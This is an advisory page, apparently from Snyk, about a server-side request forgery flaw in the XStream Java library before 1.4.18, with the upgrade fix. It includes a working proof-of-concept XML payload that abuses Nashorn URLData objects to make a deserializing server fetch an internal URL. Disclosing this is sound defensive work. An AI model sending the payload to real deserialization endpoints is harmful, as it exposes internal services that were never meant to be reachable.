Server-Side Request Forgery (SSRF) Affecting com.thoughtworks.xstream:xstream Open this link in a new tab package, versions [,1.4.18)


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Scope

    Changed

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190

  • published

    24 Aug 2021

  • disclosed

    24 Aug 2021

  • credit

    m0d9

How to fix?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

PoC

<map>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs>GBK</cs>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
</map>
XStream xstream = new XStream();
xstream.fromXML(xml);